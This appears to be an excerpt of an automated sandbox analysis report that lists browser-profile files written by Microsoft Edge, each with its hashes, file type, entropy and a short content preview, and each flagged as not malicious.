                                                                                                                                                                                                                                                                          Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                          Entropy (8bit):2.7754741265074903
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:192:tTotMoco6nItyuPQBwx5mvhXcf0L/ZJVb:Vopco2ItyuUhXI0LhJVb
                                                                                                                                                                                                                                                                          MD5:846CC924746D2E53AF10A0FC90C29E87
                                                                                                                                                                                                                                                                          SHA1:B207ACCBCF94D9527036BEECC0002BA4178DB2F7
                                                                                                                                                                                                                                                                          SHA-256:18E660D45FB7A7E730697D2DB6414B7FF49D72BE7B8841A6549DDE2DD849472A
                                                                                                                                                                                                                                                                          SHA-512:B300C4624F83DEE17C5521375D596222E5DE7403B6331F70318B498BB19394462E3A3379AC839E1EBFD47096E2E8A67162193875797731328CDD6F8F9C688071
                                                                                                                                                                                                                                                                          Malicious:false
Preview:SQLite format 3......
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):36864
                                                                                                                                                                                                                                                                          Entropy (8bit):1.439850190492089
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:T6IopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBMLV:OIEumQv8m1ccnvS6Qm4peztAs1a
                                                                                                                                                                                                                                                                          MD5:95C559D00A09892E14BE21DFFA1C9156
                                                                                                                                                                                                                                                                          SHA1:16E3D4B44A0CFE25828BD48896C3C89A294562EC
                                                                                                                                                                                                                                                                          SHA-256:3E4EAB41DA5EE484B87AB0D0B03116AAFD720892FC8E35FDAB250C277B7588DD
                                                                                                                                                                                                                                                                          SHA-512:3C3C26EED53206DC7A4F4C208352EEBF1975C6977E00ABD667FD19C4DA0D9F03247130796B6F7FE1236A26862179C2CE5D0454855D2A9A90F9D3FC435B55AA94
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[]
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                                                                                                                          Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                          MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                          SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                          SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                          SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                          Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                                          MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                                          SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                                          SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                                          SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):13612
                                                                                                                                                                                                                                                                          Entropy (8bit):5.239382828551976
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:192:stbJ99QTryDigabatSuypXskrXIa34HkgYYUQ1i8CbV+FCwQwd4Cbq7NIaPfYJ:stbPGKSu4XskrXXrbGJQwmCm7NIj
                                                                                                                                                                                                                                                                          MD5:F73F00C757A5C884BC03C2E263C3F174
                                                                                                                                                                                                                                                                          SHA1:BD943C6EB9312EA3A3D32E098F73E61A639FD349
                                                                                                                                                                                                                                                                          SHA-256:F6FFF2EB599E8A043A7DE7799BFABE05B72A4BDD25A028B534430EE012C6FB34
                                                                                                                                                                                                                                                                          SHA-512:D4D643C7AAC62BB31C8903F405982A66695A100A4CE248729A5955484521EF370ADE2A009FD3FBCD0FC1DD17F8411812D62F58662E9CD0C1E03D3C81D2846140
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380904536315242","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):37149
                                                                                                                                                                                                                                                                          Entropy (8bit):5.564363640164279
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:0ZnyHkWPxhfkF8F1+UoAYDCx9Tuqh0VfUC9xbog/OV88apJv+rwc9oWR6ZmqKpQw:0ZnyHkWPxhfkFu1jaJ8aLvbUoWR65Rt6
                                                                                                                                                                                                                                                                          MD5:4AFAA8BA13143DA296EC368EFACC7946
                                                                                                                                                                                                                                                                          SHA1:D7D83AA46EF28CEDEB6D1AE4B39BE1C7E6606ADE
                                                                                                                                                                                                                                                                          SHA-256:211AA666C0922D78462908651D04F9E18B45357FCC060B1C11EC38E72184E923
                                                                                                                                                                                                                                                                          SHA-512:A06B17E49E15FA7B4E015FF39BC6E1415467D7D57A8DB404415C0BFE1707BE14F534C3CBA6DD9BEB8D2E72E34562278816672C22F434EF2ECCAC2A6E9A2EE031
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380904535643113","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380904535643113","location":5,"ma
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2394
                                                                                                                                                                                                                                                                          Entropy (8bit):5.815548883732477
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:F2xc5NmVcncmoDCRORpllg2hEJfRHOldCRORpllg2h4iV0dntFCRORpllg2hE0R3:F2em2Mrd6JfBOrdey0dNrd60B2rd6B1
                                                                                                                                                                                                                                                                          MD5:C8A7235BD6BF5C429AF53AD0BD1F7477
                                                                                                                                                                                                                                                                          SHA1:CBAFE5B4CB8AB4A303A7C8BE5BF55FF31D280B74
                                                                                                                                                                                                                                                                          SHA-256:734006A2C5C7492AF4EEE1A8E6460AC6015BAF3FC695ADD10D522D059491FD17
                                                                                                                                                                                                                                                                          SHA-512:E9692BF5E98C6FACFF6C8C839E4A9550BD57BCA41502FA4EA5ADDA1C6123E1BE8839F9E27C738489FAA8F11C29A1CF80ABAF35FFFE560453589F59870A0D16FD
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2.hS.................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true .(.0.8.......@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x.................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmpt
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):299
                                                                                                                                                                                                                                                                          Entropy (8bit):5.186043699668907
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrvejuM1CHhJ23oH+TcwtE/a252KLl5vXFIq2PCHhJ23oH+TcwtE/a2ZIFUv:7ajuAYeb8xL3OvBYeb8J2FUv
                                                                                                                                                                                                                                                                          MD5:1E0713A0F80F9D5646E680CF3B3026F7
                                                                                                                                                                                                                                                                          SHA1:8FB4B7D62F717B3C23C135CA3EE67A43E551BF28
                                                                                                                                                                                                                                                                          SHA-256:C818C7218EB8F7A84361DD517D7E043EC84F624B4372BCB63A1B24C223E33B06
                                                                                                                                                                                                                                                                          SHA-512:0DDB6579FB76FD744530FD6DBF3431B22E7F89BCC612F80C639CF463B74AA564ED8BD32E193289595A2B079866E232E68690A1BEB80FF1E4615863E3B780D143
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:45.345 1ad4 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2025/01/09-08:55:45.360 1ad4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):41
                                                                                                                                                                                                                                                                          Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                          MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                          SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                          SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                          SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):115808
                                                                                                                                                                                                                                                                          Entropy (8bit):5.578490399153549
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:B9LyxPXfOxr1lMe1nL/5L/TXJ6LwXRJ2b:91l/nL/5L/N6Lhb
                                                                                                                                                                                                                                                                          MD5:3F5EF27FE126B980C2D128DACF28C575
                                                                                                                                                                                                                                                                          SHA1:318CC96E5DC7A2032C6085E30BA2C33A6EB2E934
                                                                                                                                                                                                                                                                          SHA-256:0213AB0F5C5B5F929B6B725895EF32C7AEB4C5134B158CC9455F97C0AB866247
                                                                                                                                                                                                                                                                          SHA-512:92E8333C070DA53BB281CFBB30723868410F21BCCAF8ED1E757A40D2DF6BCDF17B8153F7E6BACC6E38AB2C9312459E2C56DFA03BFAE028CA7DCFD44E31371664
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):190361
                                                                                                                                                                                                                                                                          Entropy (8bit):6.388704838597688
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:+SgzH4W3tT5/woxkRnoeL/EO09GF5mpJzDr4KmQnBxo:Jk/wjRnlL/uM6pBjBK
                                                                                                                                                                                                                                                                          MD5:F258CB48A042B6092493E550ABC2B917
                                                                                                                                                                                                                                                                          SHA1:6DB1D995A20BC07E020D5A2DB1AEC5894E4FF50D
                                                                                                                                                                                                                                                                          SHA-256:76E38ABDF02E60DC67D10E576A528BDE7B9D6E3552096133AFEE565A8B377BA4
                                                                                                                                                                                                                                                                          SHA-512:77AEABA800D39F0FA620F2287ECC9C19096F6E799094756F8250373A7566842A19B07AE08501D3AF61AD0ED822AE81435F4BBED88D0509EED2221E916157F450
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):24
                                                                                                                                                                                                                                                                          Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                          MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                          SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                          SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                          SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:0\r..m..................
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):72
                                                                                                                                                                                                                                                                          Entropy (8bit):3.5016291673878204
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:I1K0QyXl/ltV/lxEg1W875x:I1SKgh8/
                                                                                                                                                                                                                                                                          MD5:9D179AB4A1EE831C06D3C764D789279E
                                                                                                                                                                                                                                                                          SHA1:FABF4CD57E3502BB02166B5BDB158CEA124C7275
                                                                                                                                                                                                                                                                          SHA-256:FCEF759D806B84ADE85985B89DC2B4C3FBC19F213F1F0593E532B2BC98F16424
                                                                                                                                                                                                                                                                          SHA-512:E2E41D2A0ECB224F0E011E594575B8C8FF61876F934C79C399F1B57C34CB728CE9EDB69C65E0968AC02D5B032F0A7E5F653BCA5DD5F2D23DFFD674EFFA926952
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:@....*[Goy retne.........................X....,................A.C../.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):5193
                                                                                                                                                                                                                                                                          Entropy (8bit):3.416641953333902
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:96:49wzeTQKI4mVnKtFVPVzr9Xp+C+VijNokx2Ll9iSrl1qCdQaus6Nv:la0jVnKtFVPV39Xp+CKiBDQLl9iSrlM7
                                                                                                                                                                                                                                                                          MD5:18D1CC86C4C19429BC69C1C504FCCE04
                                                                                                                                                                                                                                                                          SHA1:468AA4DF115B57862F2326E02F4CE884625C5FBA
                                                                                                                                                                                                                                                                          SHA-256:97698FD44F209061DE89833B40635A7354A954A3295E94BA46FEF5FA0870AC3F
                                                                                                                                                                                                                                                                          SHA-512:1F7EAEF4E717AD459404BE629D316E26BD659A4A36DC31FCD622A874A17C6529711225702C201810470E0CAA7CACAC4A5FF6DB7C0B1233A4F76BF9A3A9E48AE5
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f................u .b................next-map-id.1.Cnamespace-02094193_3c93_40aa_8be3_e1ba1df541ad-https://ntp.msn.com/.0h.__.................map-0-shd_sweeper.%{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.1.s.w.-.c.c.-.c.a.l.f.e.e.d.i.c.,.p.r.g.-.m.s.n.-.g.l.s.b.i.d.m.,.1.s.-.p.n.p.f.e.d.l.o.c.,.p.n.p.w.x.e.x.p.i.r.e.1.8.0.,.b.i.n.g._.v.2._.s.c.o.p.e.,.p.r.g.-.1.s.w.-.s.a.-.g.e.n.u.2.i.v.3.t.3.,.p.r.g.-.1.s.w.-.s.a.-.s.p.7.-.t.c.c.,.1.s.-.w.p.o.-.p.r.1.-.c.t.t.u.-.c.,.p.r.g.-.a.d.s.p.e.e.k.,.p.r.g.-.p.r.2.-.w.i.d.g.e.t.-.t.a.b.,.1.s.-.p.2.-.i.g.n.o.r.e.c.m.,.b.t.i.e.-.a.d.-.d.p.r.-.m.i.n.1.5.,.p.r.g.-.a.d.-.d.p.r.,.1.s.-.f.c.r.y.p.t.,.r.o.u.t.e.w.i.n.d.r.i.n.g.0.c.,.p.r.g.-.1.s.w.-.s.a.c.c.u.n.i.f.y.v.2.c.,.1.s.-.n.t.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):324
                                                                                                                                                                                                                                                                          Entropy (8bit):5.177851958086177
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrv4b+q2PCHhJ23oH+TcwtrQMxIFUtJv4oZmwPv4lVkwOCHhJ23oH+TcwtrQMFd:7sCvBYebCFUtqo/YL56YebtJ
                                                                                                                                                                                                                                                                          MD5:5763FD491F14B3E215BE426B27767837
                                                                                                                                                                                                                                                                          SHA1:96878503FC97FA5F0E1AC119D323608FE49998F2
                                                                                                                                                                                                                                                                          SHA-256:BDD07C33A8166244A468E5A0CC0F12A41376CDC364AFAD8633287E0F0C815FEC
                                                                                                                                                                                                                                                                          SHA-512:C8AE6F6FBA94B638D8747F77EF1FC4D785F7BEA9912D8E7CFF81D3551E70838905FDF63B96C1933D3B2A9B430EAF75801831269666DF1714D8EDC32521941F22
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:36.334 1a08 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/01/09-08:55:36.335 1a08 Recovering log #3.2025/01/09-08:55:36.394 1a08 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1443
                                                                                                                                                                                                                                                                          Entropy (8bit):3.811076042649066
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:3HjJOsaDpsAF4unxitLp3X2amEtG1ChqJ69KiuQKkOAM4zH:3HdpuzFELp2FEkChx9vHOpmH
                                                                                                                                                                                                                                                                          MD5:7FB902BD1BFC3C96DD13A1E9C2B94319
                                                                                                                                                                                                                                                                          SHA1:C42637F53E0E918A49834047EA70AFCB66805E2A
                                                                                                                                                                                                                                                                          SHA-256:7D5170649E6432D007237591C2C93A1158DB1A13F4111153792418A5928AA007
                                                                                                                                                                                                                                                                          SHA-512:5E5EE59C503824B9BF0C9E94B5F247D51C93CF9B70B8D3B91710C304E8884762DCAF3F063AFC2582A9AAA8801C781FF929DC1EEE1116EC7CC4E0B3A671311FCD
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SNSS.......?..r...........?..r......"?..r...........?..r.......?..r.......@..r.......@..r....!..@..r...............................?..r@..r1..,...@..r$...02094193_3c93_40aa_8be3_e1ba1df541ad...?..r.......@..r....\..........?..r...?..r.......................?..r....................5..0...?..r&...{890D5FC3-0C4C-4214-A93A-B8E730A022A1}.....?..r.......?..r.......................@..r...........@..r........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.......;K6UF+..<K6UF+.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8...............................................................
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                          Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                          MD5:B35F740AA7FFEA282E525838EABFE0A6
